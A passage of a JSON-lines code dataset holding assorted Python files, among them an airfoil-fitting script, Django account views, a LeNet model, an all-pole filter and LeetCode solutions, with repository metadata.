source file involved in creating the op.\n line_number: line number in the file involved in creating the op.\n func_name: name of the function that the line belongs to.\n op_type: (string) Operation type.\n \"\"\"\n self.device_name = device_name\n self.node_exec_stats = node_exec_stats\n self.file_path = file_path\n self.line_number = line_number\n self.func_name = func_name\n if self.file_path:\n self.file_line_func = \"%s:%d(%s)\" % (\n os.path.basename(self.file_path), self.line_number, self.func_name)\n else:\n self.file_line_func = \"\"\n self.op_type = op_type\n self.start_time = self.node_exec_stats.all_start_micros\n self.op_time = (self.node_exec_stats.op_end_rel_micros -\n self.node_exec_stats.op_start_rel_micros)\n @property\n def exec_time(self):\n return self.node_exec_stats.all_end_rel_micros\nclass AggregateProfile(object):\n def __init__(self, profile_datum):\n \"\"\"Constructor.\n Args:\n profile_datum: (`ProfileDatum`) an instance of `ProfileDatum` to\n initialize this object with.\n \"\"\"\n self.total_op_time = profile_datum.op_time\n self.total_exec_time = profile_datum.exec_time\n device_and_node = \"%s:%s\" % (profile_datum.device_name,\n profile_datum.node_exec_stats.node_name)\n self._node_to_exec_count = {device_and_node: 1}\n def add(self, profile_datum):\n \"\"\"Accumulate a new instance of ProfileDatum.\n Args:\n profile_datum: (`ProfileDatum`) an instance of `ProfileDatum` to\n accumulate to this object.\n \"\"\"\n self.total_op_time += profile_datum.op_time\n self.total_exec_time += profile_datum.exec_time\n device_and_node = \"%s:%s\" % (profile_datum.device_name,\n profile_datum.node_exec_stats.node_name)\n device_and_node = \"%s:%s\" % (profile_datum.device_name,\n profile_datum.node_exec_stats.node_name)\n if device_and_node in self._node_to_exec_count:\n self._node_to_exec_count[device_and_node] += 1\n else:\n self._node_to_exec_count[device_and_node] = 1\n @property\n def node_count(self):\n return len(self._node_to_exec_count)\n @property\n def node_exec_count(self):\n return sum(self._node_to_exec_count.values())\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_2/profiling.py.transformed.py","file_name":"profiling.py.transformed.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20624015281","text":"from math import factorial\nimport numpy as np\nimport scipy.optimize\n\n\ndef get_airfoil_coord(wu, wl, yute, ylte, x=None):\n # N1 and N2 parameters (N1 = 0.5 and N2 = 1 for airfoil shape)\n N1 = 0.5\n N2 = 1\n\n # Create x coordinate\n if x is None: # if x_arr is not provided\n N = 161 #TODO: hard coded for now\n # x is listed in XFoil format, i.e. counter-clockwise starting from upper trailing edge, wrapping around leading edge and ending at lower trailing edge\n x = 0.5 * (1 + np.cos(np.linspace(0, 2*np.pi, N)))\n\n j_le = np.argmin(x)\n xu = x[:j_le] # upper surface x-coordinates\n xl = x[j_le:] # lower surface x-coordinates\n\n yu = eval_shape_fcn(wu, xu, N1, N2, yute) # upper surface y-coordinates\n yl = eval_shape_fcn(wl, xl, N1, N2, ylte) # lower surface y-coordinates\n\n y = np.concatenate([yu, yl])\n\n return np.array([x, y]).T\n\n\ndef eval_shape_fcn(w, x, N1, N2, yte):\n \"\"\"\n compute class and shape function\n :param w:\n :param x:\n :param N1:\n :param N2:\n :param yte: trailing edge y coordinate\n :return:\n \"\"\"\n C = x**N1 * (1-x)**N2\n\n n = len(w) - 1 # degree of Bernstein polynomials\n\n S = np.zeros_like(x)\n for j in range(0, n+1):\n K = factorial(n)/(factorial(j)*(factorial(n-j)))\n S += w[j]*K*x**j * ((1-x)**(n-j))\n\n return C * S + x * yte\n\n\ndef list_to_kulfan_params(var):\n nw = len(var) // 2\n wu = var[0:nw]\n wl = var[nw:(2*nw)]\n\n assert len(var) == (2 * nw)\n return wu, wl\n\n\ndef obj_fcn_airfoil_inversion(var, xy_ref):\n \"\"\"\n objective function to minimize: discrepancy between reference coordinates and parametrized airfoil coordinates\n :param var: variable to optimize\n :param xy_ref: n-by-2 array of reference coordinates following XFoil format (CCW)\n :return:\n \"\"\"\n wu, wl = list_to_kulfan_params(var)\n yute = xy_ref[0, 1]\n ylte = xy_ref[-1, 1]\n\n xy_kulfan = get_airfoil_coord(wu, wl, yute, ylte, x=xy_ref[:, 0])\n\n # scale for normalization\n y_scale = np.max(xy_ref[: 1]) - np.min(xy_ref[:, 1])\n # y_scale = 1e-2 # an arbitrary scale\n # y_scale = np.maximum(1e-2, np.fabs(xy_ref[:, 1]))\n # y_scale = np.max(xy_ref[: 1]) - np.min(xy_ref[:, 1]) * (2 - np.cos(2*pi*xy_ref[:, 0]/xte))\n\n npts = xy_ref.shape[0]\n\n return np.sum(((xy_ref[:, 1] - xy_kulfan[:, 1]) / y_scale)**2.0) / npts\n\n\ndef infer_kulfan_params(xy_ref, var_init):\n \"\"\"\n infer kulfan parameters given reference/target airfoil coordinates\n \"\"\"\n nvar = len(var_init)\n lb = [-2.] * nvar\n ub = [2.] * nvar\n\n if True:\n bounds = scipy.optimize.Bounds(lb, ub, keep_feasible=False)\n options_opt = {\"maxiter\": 1e6}\n\n opt_method = \"SLSQP\"\n # opt_method = \"L-BFGS-B\"\n # opt_method = \"TNC\"\n opt_result = scipy.optimize.minimize(obj_fcn_airfoil_inversion, var_init, args=xy_ref,\n method=opt_method, tol=1e-16, bounds=bounds, options=options_opt)\n else:\n obj_fcn = lambda x: obj_fcn_airfoil_inversion(x, xy_ref)\n opt_result = scipy.optimize.dual_annealing(obj_fcn, bounds=list(zip(lb, ub)), seed=1234)\n\n print(f\"Optimization result:\\n{opt_result}\")\n\n return list_to_kulfan_params(opt_result.x)\n\n\ndef main():\n import sys\n if sys.platform == 'darwin': # MacOS\n import matplotlib\n matplotlib.use('Qt5Agg')\n import matplotlib.pyplot as plt\n import os\n\n path = './data/'\n\n # reference coordinates\n # airfoilname = \"RAE2822\"\n # airfoilname = \"b737a-il\"\n airfoilname = \"e387\"\n # airfoilname = \"whitcomb\"\n # airfoilname = \"nasasc2-0714\"\n fname_input_airfoil = os.path.join(path, f\"{airfoilname}.txt\")\n xy_ref = np.genfromtxt(fname_input_airfoil, dtype=float, skip_header=1)\n\n airfoilname_inverse = f\"{airfoilname}_kulfan\"\n\n # fix trailing edge y coordinates based on reference airfoil coordinates\n yute = xy_ref[0, 1]\n ylte = xy_ref[-1, 1]\n\n poly_deg = 5\n wu = [0.1] * (poly_deg + 1)\n wl = [-0.1] * (poly_deg + 1)\n\n var_init = list()\n var_init.extend(wu)\n var_init.extend(wl)\n\n xy_coords_init = get_airfoil_coord(wu, wl, yute, ylte)\n # plot initial guess of airfoil\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(111)\n ax.plot(xy_ref[:, 0], xy_ref[:, 1], \"k.--\", label=\"Input\")\n ax.plot(xy_coords_init[:, 0], xy_coords_init[:, 1], \"-.\", linewidth=2, label=\"Initial guess\")\n\n ax.legend()\n ax.grid(True)\n ax.set_xlim([0, 1])\n ax.axis('equal')\n ax.set_xticks(np.arange(0, 1.1, 0.1))\n plt.show(block=True)\n\n # infer Kulfan parameters by optimization\n wu, wl = infer_kulfan_params(xy_ref, var_init)\n\n # get inferred Kulfan airfoil coordinates\n xy_coords = get_airfoil_coord(wu, wl, yute, ylte)\n\n # save to coordinate file\n fpath = os.path.join(path, f'{airfoilname_inverse}.dat')\n np.savetxt(fpath, xy_coords, delimiter=\" \", newline=\"\\n\")\n\n # plot airfoil\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(111)\n ax.plot(xy_coords[:, 0], xy_coords[:, 1], marker=\".\", linewidth=2, label=airfoilname_inverse)\n ax.plot(xy_coords_init[:, 0], xy_coords_init[:, 1], \"-.\", linewidth=2, label=\"Initial guess\")\n ax.plot(xy_ref[:, 0], xy_ref[:, 1], \"k.--\", label=\"Input\")\n\n ax.legend()\n ax.grid(True)\n ax.set_xlim([0, 1])\n ax.axis('equal')\n ax.set_xticks(np.arange(0, 1.1, 0.1))\n\n ax.set_title(f\"Kulfan airfoil with parameters: yute={yute:.4e}, ylte={ylte:.4e}\\n\"\n f\"wu={wu}\\nwl={wl}\")\n\n fig.tight_layout()\n\n fig.savefig(os.path.join(path, f'{airfoilname_inverse}.png'))\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"zsmeditation/airfoil_param","sub_path":"kulfan_airfoil.py","file_name":"kulfan_airfoil.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"35245047602","text":"import sys\nfrom collections import deque\nfrom heapq import heappush, heappop\n\ndef bfs():\n q = deque()\n\n q.append((0,0))\n vis[0][0] = 0\n\n while q:\n (x,y) = q.popleft()\n \n for i in range(4):\n _dx = x + dx[i]\n _dy = y + dy[i]\n\n if 0<= _dx < r and 0<=_dy\\d+)/$', RequestCarsList.as_view(), name='request_cars'),\n]","repo_name":"aurimukas/compensa","sub_path":"com_local/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17638978686","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\nImplement a magic directory with buildDict, and search methods.\n\nFor the method buildDict, you'll be given a list of non-repetitive words to build a dictionary.\n\nFor the method search, you'll be given a word, and judge whether if you modify exactly one character into another character in this word, the modified word is in the dictionary you just built.\n\nExample 1:\nInput: buildDict([\"hello\", \"leetcode\"]), Output: Null\nInput: search(\"hello\"), Output: False\nInput: search(\"hhllo\"), Output: True\nInput: search(\"hell\"), Output: False\nInput: search(\"leetcoded\"), Output: False\nNote:\nYou may assume that all the inputs are consist of lowercase letters a-z.\nFor contest purpose, the test data is rather small by now. You could think about highly efficient algorithm after the contest.\nPlease remember to RESET your class variables declared in class MagicDictionary, as static/class variables are persisted across multiple test cases. Please see here for more details.\n\n\"\"\"\n\n\nclass MagicDictionary(object):\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.trie = {}\n\n def buildDict(self, dict):\n \"\"\"\n Build a dictionary through a list of words\n :type dict: List[str]\n :rtype: void\n \"\"\"\n\n for i, word in enumerate(dict):\n t = self.trie\n for j, v in enumerate(word):\n if v not in t:\n t[v] = {'#': False}\n t = t[v]\n t['#'] = True\n\n def search(self, word):\n \"\"\"\n Returns if there is any word in the trie that equals to the given word after modifying exactly one character\n :type word: str\n :rtype: bool\n \"\"\"\n if not word:\n return False\n\n chs = [chr(i) for i in range(ord('a'), ord('a') + 26)]\n for i in range(len(word)):\n for ch in chs:\n if ch != word[i]:\n # print(\"searching \" + word[:i] + ch + word[i+1:])\n if self.search_impl(word[:i] + ch + word[i + 1:], self.trie):\n return True\n\n return False\n\n def search_impl(self, word, trie):\n t = trie\n for i, v in enumerate(word):\n if v not in t:\n return False\n t = t[v]\n\n return t['#']\n\n\n # Your MagicDictionary object will be instantiated and called as such:\n # obj = MagicDictionary()\n # obj.buildDict(dict)\n # param_2 = obj.search(word)\n\nd = MagicDictionary()\nd.buildDict([\"hello\", \"hallo\", \"leetcode\"])\nprint(d.search(\"hello\"))\nprint(d.search(\"hello\"))\nprint(d.search(\"hell\"))\nprint(d.search(\"leetcodd\"))","repo_name":"shhuan/algorithms","sub_path":"leetcode/medium/Implement_Magic_Dictionary.py","file_name":"Implement_Magic_Dictionary.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27827552746","text":"class Employee:\n num_of_emps = 0\n raise_amount = 1.04\n\n # below is constructor\n def __init__(self, first, last, pay):\n self.first = first\n self.last = last\n self.pay = pay\n self.email = first + '.' + last + '@company.com'\n self.dates = []\n Employee.num_of_emps += 1\n\n def fullname(self):\n return '{} {}'.format(self.first, self.last)\n\n def apply_raise(self):\n self.pay = int(self.pay * Employee.raise_amount) # could also do self.raise_amount\n\n\nemp_1 = Employee('Corey', 'Schafer', 50000)\nemp_2 = Employee('Test', 'User', 60000)\nemp_1.dates.append('test');\n\nprint(emp_1.pay)\nemp_1.apply_raise()\nprint(emp_1.pay)\nprint(emp_1.dates)\n","repo_name":"kevdevrev/Live_Graph_Matplotlib","sub_path":"clasesfun.py","file_name":"clasesfun.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18210700522","text":"class Solution:\n def nextLargerNodes(self, head: ListNode) -> List[int]:\n ans = []\n stack = []\n\n while head:\n while stack and head.val > ans[stack[-1]]:\n index = stack.pop()\n ans[index] = head.val\n stack.append(len(ans))\n ans.append(head.val)\n head = head.next\n\n for i in stack:\n ans[i] = 0\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1019. Next Greater Node In Linked List/1019.py","file_name":"1019.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"17717758026","text":"import torch\nfrom torch import nn\n\nclass LeNet(nn.Module):\n def __init__(self):\n super(LeNet, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(3, 6, kernel_size=5),\n nn.ReLU(),\n nn.AvgPool2d(2),\n\n nn.Conv2d(6, 16, kernel_size= 5),\n nn.ReLU(),\n nn.AvgPool2d(2),\n\n nn.Flatten(),\n\n nn.Linear(16 * 5 * 5, 120),\n nn.ReLU(),\n\n nn.Linear(120, 84),\n nn.ReLU(),\n\n nn.Linear(84, 10),\n )\n\n def forward(self, x):\n x = self.features(x)\n return x\n","repo_name":"sonLe-Thanh/PHDimExperiments","sub_path":"models/LeNet.py","file_name":"LeNet.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12482399241","text":"import torch\nimport torch.nn.functional as F\n\ndef allpole(x: torch.Tensor, a: torch.Tensor) -> torch.Tensor:\n \"\"\"\n All-pole filter\n :param x: input signal,\n shape (B, C, T) (batch, channels, timesteps)\n :param a: filter coefficients (denominator),\n shape (C, N, T) (channels, num taps, timesteps)\n :return: filtered signal\n shape (B, C, T) (batch, channels, timesteps)\n \"\"\"\n y = torch.zeros_like(x)\n\n a_normalized = a / a[:, 0:1, :]\n\n # filter order\n p = a.shape[1] - 1\n\n # filter coefficients\n a1 = a_normalized[:, 1:, :]\n\n # flip coefficients\n a1 = torch.flip(a1, [1])\n\n # zero pad y by filter order\n y = torch.nn.functional.pad(y, (p, 0))\n\n # filter\n for i in range(p, y.shape[-1]):\n y[..., i] = x[..., i - p] - \\\n torch.sum(a1[..., i - p] * y[..., i - p:i], dim=-1)\n\n return y[..., p:]\n\nclass AllPoleFunction(torch.autograd.Function):\n\n @staticmethod\n def forward(ctx, x, a):\n y = allpole(x, a)\n ctx.save_for_backward(y, x, a)\n return y\n\n @staticmethod\n def backward(ctx, dy):\n y, x, a = ctx.saved_tensors\n dx = da = None\n\n n_batch = x.size(0)\n n_channels = x.size(1)\n p = a.size(1) - 1\n T = dy.size(-1)\n\n # filter or\n dyda = allpole(-y, a)\n dyda = torch.nn.functional.pad(dyda, (p, 0))\n\n # da = torch.zeros_like(a)\n # for i in range(0, T):\n # for j in range(0, p):\n # da[:, p, i] = dyda[..., i:i+T] * dy\n # da = da.flip([1])\n\n\n da = F.conv1d(\n dyda.view(1, n_batch * n_channels, -1),\n dy.view(n_batch * n_channels, 1, -1),\n groups=n_batch * n_channels).view(n_batch, n_channels, -1).sum(0).flip(1)\n \n dx = allpole(dy.flip(-1), a.flip(-1)).flip(-1)\n\n return dx, da\n\nclass AllPole(torch.nn.Module):\n\n def __init__(self):\n super().__init__()\n\n def forward(self, x, a):\n return AllPoleFunction.apply(x, a)\n\n","repo_name":"ljuvela/GlotNet","sub_path":"glotnet/sigproc/allpole.py","file_name":"allpole.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12255874424","text":"# ip-адрес mqtt брокера\nIP='localhost'\n\n# порт mqtt брокера\nPORT=1883\n\n# имя топика MQTT брокера\nTOPIC='abotcmd1'\n\n# скорость движения бота в метрах в секунду\nLINEAR_VELOCITY=1.0\n\n# скорость поворота бота в радиант в секунду\nANGULAR_VELOCITY=1.5707963267948966\n\n# имя файла координат\nFILE='path.txt'\n\n\n\n","repo_name":"bairdob/IntellectualTechnicalSystems","sub_path":"part1/practice1/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39605970521","text":"from audioop import reverse\nfrom django.conf import settings\nfrom django.shortcuts import redirect, render\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes, force_str\nfrom django.template.loader import render_to_string\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import EmailMessage\nfrom django.conf import settings\n\nfrom apps.account.models import Account\nfrom .forms import RegistrationForm, UserForm\nfrom apps.account.utils import generate_token\n\n\ndef home(request):\n return render(request, 'base.html')\n\ndef send_activation_email(user: Account, request):\n current_site = get_current_site(request)\n email_subject = 'Activate your account'\n email_body = render_to_string('accounts/verify.html', {\n 'user': user,\n 'domain': current_site,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'token': generate_token.make_token(user)\n })\n EmailMessage(\n subject=email_subject, \n body=email_body, \n from_email=settings.EMAIL_FROM_USER, \n to=[user.email]\n )\n\n\ndef log_user_in(request):\n if request.method == \"POST\":\n form = UserForm(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n messages.info(request, f\"You are now logged in as {username}.\")\n return redirect(\"homepage\")\n else:\n messages.error(request,\"Invalid username or password.\")\n else:\n messages.error(request,\"Invalid username or password.\")\n else:\n form = UserForm()\n return render(request, 'accounts/login.html', context={'form':form})\n\n\ndef log_user_out(request):\n if request.user.is_authenticated:\n logout(request)\n return redirect('login')\n\n\ndef register(request):\n if request.user.is_authenticated:\n next_url = request.GET.get('next') or 'homepage'\n return redirect(next_url)\n if request.method == 'POST':\n form = RegistrationForm(request.POST,request.FILES)\n if form.is_valid():\n user = form.save(commit=True)\n user.is_active = True\n user.save()\n send_activation_email()\n login(request, user)\n next_url = request.POST.get('next')\n return redirect(next_url)\n else:\n form = RegistrationForm(request.POST,request.FILES)\n else:\n form = RegistrationForm()\n return render(request, 'accounts/register.html', context={'form': form, 'next': request.GET.get('next') or 'homepage'})\n\n\ndef activate_user(request, uid64, token):\n try:\n uid = force_str(urlsafe_base64_decode(uid64))\n user = Account.objects.get(pk=uid)\n except Exception as e:\n user=None\n\n if user and generate_token.check_token(user, token):\n user.is_email_verified=True\n user.save()\n\n messages.add_message(request, messages.SUCCESS, 'Email verified, you can login now')\n return redirect(reverse('login'))\n\n return render(request, 'accounts/activation-failed.html', {'user': user})","repo_name":"Msibragimov/test_for_test","sub_path":"apps/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36911984020","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 3 10:37:43 2020\n\n@author: javier.moral.hernan1\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom xgboost import XGBClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.metrics import balanced_accuracy_score\nfrom src.models.neural_net.createNeuralNetwork import NeuralNetModel\n\n\nclass MajorityMinorityEnsemble():\n\n def __init__(self, X_train, X_test,\n y_train, y_test, external_data,\n model_1_selected, model_2_selected):\n\n self.X_train = X_train\n self.X_test = X_test\n self.y_train = y_train\n self.y_test = y_test\n self.external_data = external_data\n self.filter_minority()\n self.model_1_selected = model_1_selected\n self.select_first_model()\n self.model_2_selected = model_2_selected\n self.select_second_model()\n self.fit()\n self.predict()\n self.score()\n\n def filter_minority(self):\n '''\n Creates a binary target where value 1 matches the majority class\n intances and 0 all remaining classes, filters a second train set\n with minority class instances\n\n Returns\n -------\n None.\n '''\n mask_train = self.y_train['CLASE'] != 'RESIDENTIAL'\n self.X_train_minority = self.X_train[mask_train].copy()\n self.y_train_minority = self.y_train[mask_train].copy()\n self.y_train_binary = self.y_train[\n 'CLASE'] .map(lambda x: 1 if x == 'RESIDENTIAL' else 0)\n self.target_encoder = LabelEncoder()\n self.y_train_minority = self.target_encoder.fit_transform(\n self.y_train_minority)\n\n def select_first_model(self):\n '''\n Gets the first model seleted.\n\n Returns\n -------\n None.\n '''\n if self.model_1_selected == 'randomforest':\n self.model1 = RandomForestClassifier(class_weight = 'balanced')\n if self.model_1_selected == 'gradientboosting':\n self.model1 = GradientBoostingClassifier() \n if self.model_1_selected == 'xgboost':\n self.model1 = XGBClassifier(\n learning_rate=0.1, max_depth=3, min_child_weight=1,\n n_estimators=100, n_jobs=-1)\n if self.model_1_selected == 'nn':\n self.NN = NeuralNetModel(self.X_train)\n self.model1 = self.NN.model\n\n def select_second_model(self):\n '''\n Gets the second model seleted.\n\n Returns\n -------\n None.\n '''\n if self.model_2_selected == 'randomforest':\n self.model2 = RandomForestClassifier(class_weight = 'balanced')\n if self.model_2_selected == 'gradientboosting':\n self.model2 = GradientBoostingClassifier() \n if self.model_2_selected == 'xgboost':\n self.model2 = XGBClassifier(\n learning_rate=0.1, max_depth=3, min_child_weight=1,\n n_estimators=100, n_jobs=-1)\n if self.model_1_selected == 'nn':\n self.NN = NeuralNetModel(self.X_train)\n self.model1 = self.NN.model\n\n def fit(self):\n '''\n Fits the models seleted using its corresponding train data:\n - First model with the whole set and binary target\n - Second model with minority class intances.\n\n Returns\n -------\n None.\n '''\n self.model1.fit(self.X_train, self.y_train_binary)\n self.model2.fit(self.X_train_minority, self.y_train_minority)\n\n def inverse_encoding(self, data):\n '''\n Decodes previously encoded data.\n\n Returns\n -------\n None.\n '''\n data_uncoded = self.target_encoder.inverse_transform(data)\n return data_uncoded\n\n def predictDataset(self, preds1, preds2):\n predictions = pd.concat([preds1,\n preds2], axis=1)\n predictions.columns = ['model1', 'model2']\n predictions['preds'] = 'nan'\n for row in predictions.iterrows():\n if row[1]['model1'] == 1:\n predictions.at[row[0], 'preds'] = 'RESIDENTIAL'\n else:\n predictions.at[row[0], 'preds'] = row[1]['model2']\n return predictions\n\n def predict(self):\n '''\n Computes predictions for each datset using the fitted model.\n\n Returns\n -------\n None.\n '''\n preds_train1 = pd.DataFrame(self.model1.predict(self.X_train))\n preds_test1 = pd.DataFrame(self.model1.predict(self.X_test))\n preds_ext1 = pd.DataFrame(self.model1.predict(self.external_data))\n preds_train2 = pd.DataFrame(\n self.inverse_encoding(self.model2.predict(self.X_train)))\n preds_test2 = pd.DataFrame(\n self.inverse_encoding(self.model2.predict(self.X_test)))\n preds_ext2 = pd.DataFrame(\n self.inverse_encoding(self.model2.predict(self.external_data)))\n preds_train_df = self.predictDataset(preds_train1, preds_train2)\n preds_test_df = self.predictDataset(preds_test1, preds_test2)\n preds_ext_df = self.predictDataset(preds_ext1, preds_ext2)\n self.preds_train = preds_train_df['preds']\n self.preds_test = preds_test_df['preds']\n self.preds_ext = preds_ext_df['preds']\n\n\n def score(self):\n '''\n Computes and stores the accuracy, balanced accuracy, confussion matrix\n and f1_macro metrics for train an tests predictions.\n\n Returns\n -------\n None.\n '''\n self.acc_train = accuracy_score(self.y_train, self.preds_train)\n self.acc_test = accuracy_score(self.y_test, self.preds_test)\n self.balanced_acc_train = balanced_accuracy_score(self.y_train,\n self.preds_train)\n self.balanced_acc_test = balanced_accuracy_score(self.y_test,\n self.preds_test)\n self.f1_train = f1_score(self.y_train, self.preds_train,\n average='macro')\n self.f1_test = f1_score(self.y_test, self.preds_test,\n average='macro')\n self.cf_train = confusion_matrix(self.y_train, self.preds_train)\n self.cf_test = confusion_matrix(self.y_test, self.preds_test)\n\n def get_score(self):\n '''\n Computes the score using some metrics for train and test predictions.\n\n Returns\n -------\n Scores. dict. Dictionary with all the stored metrics\n '''\n scores = {'Accuracy_train': self.acc_train,\n 'Accuracy_test': self.acc_test,\n 'Balanced_Accuracy_train': self.balanced_acc_train,\n 'Balanced_Accuracy_test': self.balanced_acc_test,\n 'F1_train': self.f1_train,\n 'F1_test': self.f1_test,\n 'CM train': self.cf_train,\n 'CM test': self.cf_test}\n return scores\n \n def get_predictions(self, dataset='test'):\n '''\n Computes the preditions for the selected dataset using the\n fitted model.\n\n Returns\n -------\n preds_comp. pandas.DataFrame.\n '''\n if dataset == 'train':\n dict_preds = {'y_train': list(self.y_train),\n 'preds': list(self.preds_train)}\n preds_comp = pd.DataFrame(dict_preds)\n\n if dataset == 'test':\n dict_preds = {'y_test': list(self.y_test),\n 'preds': list(self.preds_test)}\n preds_comp = pd.DataFrame(dict_preds)\n if dataset == 'external':\n preds_comp = pd.DataFrame(self.preds_ext)\n preds_comp = pd.DataFrame(preds_comp)\n return preds_comp\n\n def get_var_importance(self):\n '''\n Shows the second models' variable importance of the trained model.\n\n Returns\n -------\n fig. matplotlib.pyplot.figure. Barplot with feature importances\n '''\n features_imp = {}\n self.model_selected = self.model2\n for column, importance in zip(\n self.X_train.columns,\n self.model_selected.feature_importances_):\n features_imp[column] = importance\n features_imp_df_train = (pd.DataFrame.from_dict(features_imp,\n orient='index')\n .reset_index()\n .sort_values(by=[0], ascending=False))\n features_imp_df_train.columns = ['Variable', 'Importance']\n features_imp_df_train = features_imp_df_train.iloc[0:10, :]\n fig = plt.figure(figsize=(5, 4))\n sns.barplot(y='Variable', x='Importance',\n data=features_imp_df_train)\n plt.title('Model Variable Importance')\n return fig\n","repo_name":"javiermoralh/Minsait_Land_Classification_DataShow","sub_path":"src/models/majority_minority_ensemble.py","file_name":"majority_minority_ensemble.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17806616884","text":"\r\nclass Bank:\r\n def __init__(self, total):\r\n self.total = total\r\n self.version = 'V27'\r\n\r\n def input_money(self, _input):\r\n self.total += _input\r\n print(\"[ATM] total balance: \", self.total)\r\n\r\n def withdraw_money(self, _output):\r\n if self.total < _output:\r\n print(\"[error] Not enough balance.\")\r\n else:\r\n self.total -= _output\r\n print(\"[ATM] total balance: \", self.total)\r\n\r\n def show_information(self):\r\n print(\"[ATM] This machine is avaiable (\", self.version, \")\")\r\n\r\n\r\nif __name__ == '__main__':\r\n machine_a = Bank(100)\r\n machine_a.input_money(5000)\r\n machine_a.withdraw_money(400)\r\n machine_a.show_information()\r\n\r\n\r\n\r\n","repo_name":"posjkh22-sub/python_basic","sub_path":"(2019-12-25) first commit/project3/bank_module.py","file_name":"bank_module.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30855029298","text":"import random\n\nfrom mathmaker.lib import shared\nfrom mathmaker.lib.constants.latex import COLORED_QUESTION_MARK\nfrom mathmaker.lib.core.root_calculus import Value\nfrom mathmaker.lib.core.base_calculus import Product\nfrom mathmaker.lib.document.content import component\n\n\nclass sub_object(component.structure):\n\n def __init__(self, build_data, **options):\n nb_list = list(build_data)\n self.nb1, self.nb2 = random.sample(nb_list, 2)\n self.product = Product([self.nb1, self.nb2]).evaluate()\n self.transduration = 9\n\n def q(self, **options):\n # self.substitutable_question_mark = True\n return _('{q_mark} × {q_mark} = {n}\\n\\n'\n '(in the multiplication tables, from 2 to 9)')\\\n .format(n=Value(self.product).into_str(),\n q_mark=COLORED_QUESTION_MARK)\n\n def a(self, **options):\n # This is actually meant for self.preset == 'mental calculation'\n if self.product == 12:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([2, 6]).printed),\n product2=shared.machine.write_math_style2(\n Product([3, 4]).printed))\n\n elif self.product == 16:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([2, 8]).printed),\n product2=shared.machine.write_math_style2(\n Product([4, 4]).printed))\n\n elif self.product == 18:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([2, 9]).printed),\n product2=shared.machine.write_math_style2(\n Product([3, 6]).printed))\n\n elif self.product == 24:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([3, 8]).printed),\n product2=shared.machine.write_math_style2(\n Product([4, 6]).printed))\n\n elif self.product == 36:\n return _(\"{product1} or {product2}\")\\\n .format(product1=shared.machine.write_math_style2(\n Product([6, 6]).printed),\n product2=shared.machine.write_math_style2(\n Product([4, 9]).printed))\n\n else:\n return shared.machine.write_math_style2(Product([self.nb1,\n self.nb2])\n .printed)\n\n def js_a(self, **kwargs):\n if self.product == 12:\n return [Product([2, 6]).jsprinted, Product([6, 2]).jsprinted,\n Product([3, 4]).jsprinted, Product([4, 3]).jsprinted]\n elif self.product == 16:\n return [Product([2, 8]).jsprinted, Product([8, 2]).jsprinted,\n Product([4, 4]).jsprinted]\n elif self.product == 18:\n return [Product([2, 9]).jsprinted, Product([9, 2]).jsprinted,\n 